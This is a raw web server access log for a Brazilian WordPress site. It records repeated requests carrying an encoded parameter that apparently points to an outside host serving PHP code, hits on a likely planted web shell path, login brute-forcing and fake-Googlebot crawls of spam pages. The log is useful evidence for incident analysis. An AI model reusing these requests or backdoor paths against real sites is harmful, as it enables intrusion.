69.197.179.242 - - [17/Mar/2026:00:20:57 -0300] "GET /wp-content/pl2ea67b/edit.php?id=41697 HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-content/pl2ea67b/edit.php?id=41697" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
179.188.53.243 - - [17/Mar/2026:00:17:30 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732313035302p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333731373435302q3665653038393834313539303533383562306166303561333032656161333361222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:00:17:51 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732313037312p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333731373437312q3935616634356431643333363936643039313739323063356233313937353264222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:00:18:13 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732313039332p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333731373439332q3833346561373633366137316231353631343331313762323066303465653933222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:00:18:34 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732313131342p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333731373531342q6234636630323633623930393363363764396132613436346261326634303566222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
74.7.228.16 - - [17/Mar/2026:00:23:37 -0300] "GET /robots.txt HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
179.188.53.243 - - [17/Mar/2026:00:18:55 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732313133352p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333731373533352q6635616234623064343337356330636530326363346330613234343761376531222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
69.197.179.242 - - [17/Mar/2026:00:22:29 -0300] "GET /wp-content/pl2ea67b/edit.php?id=41697 HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-content/pl2ea67b/edit.php?id=41697" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.74.169 - - [17/Mar/2026:00:24:00 -0300] "GET /?g=nbpvd223oeu10798msyxtegmi HTTP/1.1" 200 218593 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
179.188.53.243 - - [17/Mar/2026:00:19:16 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732313135362p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333731373535362q3230646264363034663664633434616563656439386666386638343362613661222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
138.68.183.21 - - [17/Mar/2026:00:24:15 -0300] "GET /wp-login.php HTTP/1.1" 200 74371 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
179.188.53.243 - - [17/Mar/2026:00:19:38 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732313137382p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333731373537382q3936623863303463666162346134666430633765376131346337396536643838222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
138.68.183.21 - - [17/Mar/2026:00:24:17 -0300] "POST /wp-login.php HTTP/1.1" 200 74371 "https://bandeirantesbombas.com.br/wp-login.php" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
51.91.126.203 - - [17/Mar/2026:00:24:20 -0300] "GET /wp-login.php HTTP/1.1" 200 74371 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; wbx 1.0.0)"
179.188.53.243 - - [17/Mar/2026:00:19:59 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732313139392p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333731373539392q6234353731353365643034616365323066313434643932313236346439386463222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
51.91.126.203 - - [17/Mar/2026:00:24:40 -0300] "POST /wp-login.php HTTP/1.1" 200 74371 "https://bandeirantesbombas.com.br/wp-login.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; wbx 1.0.0)"
179.188.53.243 - - [17/Mar/2026:00:20:20 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732313232302p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333731373632302q3231303138646661386461356334326330636532396138363838333738373835222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
69.197.179.242 - - [17/Mar/2026:00:24:01 -0300] "GET /wp-content/pl2ea67b/edit.php?id=41697 HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-content/pl2ea67b/edit.php?id=41697" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
74.7.244.31 - - [17/Mar/2026:00:25:39 -0300] "GET /robots.txt HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
179.188.53.243 - - [17/Mar/2026:00:20:41 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732313234312p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333731373634312q3565333364646530643031623463616666333030633764386639626238633331222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
84.54.44.204 84.54.44.204 - - [17/Mar/2026:00:25:39 -0300] "GET / HTTP/1.0" 200 74371 "http://bandeirantesbombas.com.br/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
179.188.53.243 - - [17/Mar/2026:00:21:02 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732313236322p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333731373636322q6664353437633536376365653564366231353935323535333737666134646136222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:00:21:23 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732313238332p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333731373638332q3436356438326438633939633762356236643965363733346362656130363735222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:00:21:46 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732313330362p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333731373730362q6566623733343766363938336134343235306265633438613832346137346130222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
69.197.179.242 - - [17/Mar/2026:00:25:31 -0300] "GET /wp-content/pl2ea67b/edit.php?id=41697 HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-content/pl2ea67b/edit.php?id=41697" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
179.188.53.243 - - [17/Mar/2026:00:22:09 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732313332392p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333731373732392q3863313839363965643930316336363436623837396363636233616139363437222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:00:22:30 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732313335302p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333731373735302q3932636637656235316531316230353166636231343335353264383531373331222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:00:22:51 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732313337312p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333731373737312q3364623831653132333239353966323133613838323337656132306538336464222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:00:23:12 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732313339322p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333731373739322q3764346531633031376138643733393831356139623734643037333766633834222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
69.197.179.242 - - [17/Mar/2026:00:27:03 -0300] "GET /wp-content/pl2ea67b/edit.php?id=41697 HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-content/pl2ea67b/edit.php?id=41697" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
179.188.53.243 - - [17/Mar/2026:00:23:34 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732313431342p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333731373831342q3437313937653961343938373962326530343234653833316230616565333336222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:00:23:55 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732313433352p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333731373833352q6166343239313939373237636463633866363234646137343432616163333536222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:00:24:16 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732313435362p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333731373835362q3531323533373434366632346434366530383564333533343839313430636631222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:00:24:38 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732313437382p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333731373837382q3665363161353838643062353161656165373437356631613537303264383333222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:00:25:02 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732313530322p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333731373930322q3338336562623330376365346636363263663034353437376134303035643438222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
69.197.179.242 - - [17/Mar/2026:00:28:35 -0300] "GET /wp-content/pl2ea67b/edit.php?id=41697 HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-content/pl2ea67b/edit.php?id=41697" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
179.188.53.243 - - [17/Mar/2026:00:25:23 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732313532332p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333731373932332q3365613535363430613163623931653464393431313331333361323966366135222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:00:25:44 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732313534342p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333731373934342q6433316337613536623933336139343734333166613035333564383837613233222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
74.7.244.31 - - [17/Mar/2026:00:31:04 -0300] "GET /robots.txt HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
179.188.53.243 - - [17/Mar/2026:00:26:05 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732313536352p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333731373936352q3165356565396430656533623632396231396334383663373534663330653032222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:00:26:26 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732313538362p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333731373938362q6364353734636364303930373937386564373136323133343630356331336339222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
69.197.179.242 - - [17/Mar/2026:00:30:09 -0300] "GET /wp-content/pl2ea67b/edit.php?id=41697 HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-content/pl2ea67b/edit.php?id=41697" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
179.188.53.243 - - [17/Mar/2026:00:26:48 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732313630382p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333731383030382q3763346662393739343862626235633136396663323637643961343431336165222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
45.227.253.15 - - [17/Mar/2026:00:32:01 -0300] "GET /index.php/jk HTTP/1.1" 200 43 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:103.0) Gecko/20100101 Firefox/102.0"
104.232.211.187 - - [17/Mar/2026:00:32:06 -0300] "GET /allsitemap.xml/sxallsitemap.xml HTTP/1.1" 200 219724 "-" "Mozilla/5.0(compatible;Googlebot/2.1;+http://www.google.com/bot.html)"
179.188.53.243 - - [17/Mar/2026:00:27:09 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732313632392p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333731383032392q6135363932336234326162306136336163303231643061323263373862393138222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:00:27:31 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732313635312p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333731383035312q3562376431666134303362373736353731353130343532326162643565656664222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
82.25.242.108 - - [17/Mar/2026:00:32:22 -0300] "GET /allsitemap.xml/1111/1111.html HTTP/1.1" 200 402961 "-" "Mozilla/5.0(compatible;Googlebot/2.1;+http://www.google.com/bot.html)"
179.188.53.243 - - [17/Mar/2026:00:27:52 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732313637322p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333731383037322q3761363036323166666636363538333665633665393335333839346464313865222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
69.197.179.242 - - [17/Mar/2026:00:31:41 -0300] "GET /wp-content/pl2ea67b/edit.php?id=41697 HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-content/pl2ea67b/edit.php?id=41697" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
179.188.53.243 - - [17/Mar/2026:00:28:14 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732313639342p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333731383039342q3438343863386637363262376530653832366131396462353938653232366335222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:00:28:35 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732313731352p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333731383131352q6164613638303434353133383439333439386531393232333431343864643233222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:00:28:56 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732313733362p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333731383133362q3134623165376633303662616532643436363466613362643238353730643364222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:00:29:18 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732313735382p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333731383135382q6630623339616531636131376465616633663166373462653837313834303330222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
